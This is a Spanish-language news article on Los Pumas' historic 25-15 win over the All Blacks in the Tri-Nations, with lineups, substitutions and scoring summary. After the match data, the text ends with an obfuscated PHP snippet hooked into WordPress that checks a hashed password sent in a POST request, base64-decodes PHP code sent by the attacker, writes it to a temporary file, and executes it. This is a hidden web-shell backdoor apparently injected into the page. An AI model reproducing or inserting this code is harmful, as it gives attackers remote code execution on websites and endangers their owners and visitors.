Histórico: Los Pumas sorprendieron a los All Blacks y ganaron con autoridad

Los Pumas vencieron a los All Blacks
Foto: Prensa Los Pumas

Especial, por Darío Procopio

Un día iba a ocurrir. Un día Los Pumas romperían el maleficio ante los All Blacks, el único equipo al que jamás habían derrotado. Ese día fue hoy en el estadio Bankwest de Sidney adonde el seleccionado argentino dio un golpe impensado en la previa y derrotó con autoridad a su par neozelandés por un inapelable 25 a 15, en el marco de la tercera fecha del Tri-Nations.

Desde el comienzo, se vio a los argentinos muy concentrados en su plan de juego, rápidos y con intervenciones vehementes. La gran incógnita era cuanto podía resistir ese ritmo de juego ante uno de los mejores equipos del planeta. A los 6 minutos, Nicolás Sanchez abrió el marcador con un penal y puso a Los Pumas al frente por 3 a 0 en lo que iba a ser un adelanto que se repetiría a lo largo de todo el partido: Los Pumas atacando bien y forzando a los All Blacks a detenerlos con penales.

A los 19 minutos llegó el try de los Pumas. Una gran jugada colectiva de varias fases ordenadas y con buen control de las posesiones, derivó en un irreverente sombrerito de Nico Sanchez frente a los palos. El pique de la pelota, como casi todo lo que dependió de la suerte en el partido, fue favorable al apertura albiceleste que capturo la pelota y se zambulló en el ingoal negro.

Se jugaban 31 minutos cuando una escapada de Tomas Cubelli, pasó por Bruni y desembocó en Imhoff que fue derribado a centímetros del ingoal.  El pick and Go posterior terminó con Matera adentro del ingoal pero la pelota arriba. Pudo haber sido try en cualquiera de las dos oportunidades pero lo que quedó en claro es que Los Pumas tenían resto y que se iban a animar a la historia. Dos penales más de Sanchez y uno de descuento de Richie Mo’unga dieron cifras definitivas al primer tiempo. Los Pumas se fueron al descanso con una sorprendente victoria parcial de 16 a 3.

El segundo tiempo volvió a encontrar a Los Pumas enfocados y sin fisuras. La defensa albiceleste fue tan sacrificada como disciplinada colectivamente. Los tackles buscaban siempre multiplicar a los defensores para favorecer la pesca en el ruck, así como también trabar arriba para lentificar la posibilidad de algún offload que descoloque la defensa. Fue inteligente Argentina. Los All Blacks descontaron con un try de Cane que apoyó a la salida de un buen maul, pero Los Pumas no se desesperaron nunca. Siguieron haciendo daño con ataques por el eje central de la cancha y facturando a través del pie de Nico Sanchez.

Los minutos finales encontraron a Los Pumas arriba en el marcador por 25 a 10. La desesperación que siempre fue propia, ahora era ajena y los que nunca fallan, fallaron. Los All Blacks, irreconocibles, nunca pudieron entrar en partido y fueron un concierto de Knock ons, pases equivocados y malas decisiones. Todo fue mérito de los Pumas que llevaron a los prolijos y educados neozelandeses hasta la inconducta y la impotencia. El try de Clarke con el tiempo cumplido apenas si decoró el marcador final en una victoria enorme y  justa de los argentinos por 25 a 15.

Por donde se quiera mirar esta victoria es histórica y tendrá un valor fundamental en la historia del rugby argentino. No deberemos quedarnos en el corazón y la garra. Hubo un partido de rugby y hubo un equipo que fue mejor que el otro en absolutamente todas las líneas, puestos y facetas del juego. No nos confundamos, corazón y garra, pero mucho rugby táctico y técnico.

Tampoco deberemos caer en el facilismo de elogiar solo a Nico Sánchez, autor de los 25 tantos de Los Pumas. Lo del tucumano fue enorme y es una redención después del bajón de nivel justamente durante el mundial.

Pero hubo muchos puntos altos. La primera línea que dominó el scrum. Petti y Kremer que combatieron en el cuerpo a cuerpo todo el partido. Matera y Montoya, una pesadilla pescadora de pelotas. Cubelli que estuvo rápido y jamás equivocó los caminos. Carreras, Delguy e Imhoff seguros en el fondo y siempre amagando bien el contrataque. El Tostado Orlando y el debutante Chocobares siempre saliendo bien arriba a cortar el circuito de ataque y evitar que las pelotas rivales descarguen a los extremos letales de los All Blacks. Los dos centros literalmente se rompieron la cabeza tackleando.

Llora Mario Ledesma y se abraza con Marcelo Loffreda, el hombre que siempre está en los triunfos importantes del rugby argentino. Desde la lejana Australia, la televisión regala abrazos y lágrimas que seguramente se repiten en cada casa, adonde un argentino madrugó para ver cómo en un acto de fe ciega se ganó el partido “Que nunca ganamos”. Hasta hoy.

Ya el rugby argentino no volverá a hablar de la pelota que se le cayó al flaco Ure a la salida de un scrum que entraba en el empate de 1985 en Ferro. Ya nadie se lamentara por aquella pelota que Felipe Contempomi  no pudo despejar en River y que terminó en try de Lomu con tiempo cumplido en 2001. Ya guardaremos esas historias de derrotas dignas y empates heroicos. Ya les hemos ganado y lo hicimos de visitantes, en el marco de un torneo oficial y después de entrenar durante 6 meses en la adversidad que provoco la pandemia del Covid.

Justo cuando el escenario del rugby mundial parece darle la espalda al rugby argentino, vienen los Pumas y dan un golpe que tendrá eco en los sordos pasillos de World Rugby y tambien de Saanzar, para el que quiera entenderlo y sepa disfrutarlo.

Síntesis del partido

Formaciones:

Argentina (25): 15- Santiago Carreras, 14- Bautista Delguy, 13- Matias Orlando, 12- Santiago Chocobares, 11- Juan Imhoff, 10- Nicolas Sanchez, 9- Tomas Cubelli, 8- Rodrigo Bruni, 7- Marcos Kremer, 6- Pablo Matera (C), 5- Matias Alemanno, 4- Guido Petti, 3- Francisco Gómez-Kodela, 2- Julian Montoya, 1- Nahuel Tetaz Chaparro.

Cambios: 54’ 19-Santiago Grondona por Bruni; 72’, 17-Mayco Vivas por Gomez-Kodela , 18-Santiago Medrano por Tetaz Chaparro y 20- Tomas Lezana por Alemanno; 74’ 16- Facundo Bosch por Montoya y 77’ 21-Gonzalo Bertranou por Cubelli. Sin ingreso: 22- Lucio Cinti y 23- Santiago Cordero (ingreso temporario por Carreras PT 30’).

Entrenador: Mario Ledesma

Nueva Zelanda (15): 15- Beauden Barrett, 14- Jordie Barrett, 13- Anton Lienert-Brown, 12- Jack Goodhue, 11- Caleb Clarke, 10- Richie Mo’unga, 9- Aaron Smith, 8- Ardie Savea, 7- Sam Cane (C), 6- Shannon Frizell, 5- Sam Whitelock, 4- Patrick Tuipulotu, 3- Tyrel Lomax, 2- Dane Coles, 1- Joe Moody.

Cambios: 49’ 16- Codie Taylor por Coles ; 50’ 20- Hoskins Sotutu por Frizell; 58’ 18- Nepo Laulala por Lomax; 55’ 22- Rieko Ioane por J. Barrett; 64’ 23- Damian McKenzie por Goodhue y 21- Brad Weber por Smith; 70’ 19- Tupou Vaa’i por Tuipolotu y 73’ 17- Alex Hodgman por Moody.

Entrenador: Ian Foster

Tantos del partido 

Primer Tiempo: 6’, 26’ 33’ penales de Nicolas Sanchez (A); 19’ Gol de Nicolas Sanchez por try de él mismo; 12’ penal de Richie Mo’unga (NZ)

Resultado Parcial: Argentina 16 v Nueva Zelanda 3

Segundo Tiempo: 49’, 58’ y 77’ Penales de Nicolas Sanchez (A) ; 54’ Gol de Richie Mo’unga por try de Cane (NZ) y ’80 try de Clarke (NZ)

Resultado Final: Argentina 25 v Nueva Zelanda 15

Estadio: Bankwest Stadium, Sidney, Australia.

Arbitro: Angus Gardner (AUS)

Asistentes: Nick Berry y Paul Williams

TMO: Ben O’Keefe

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}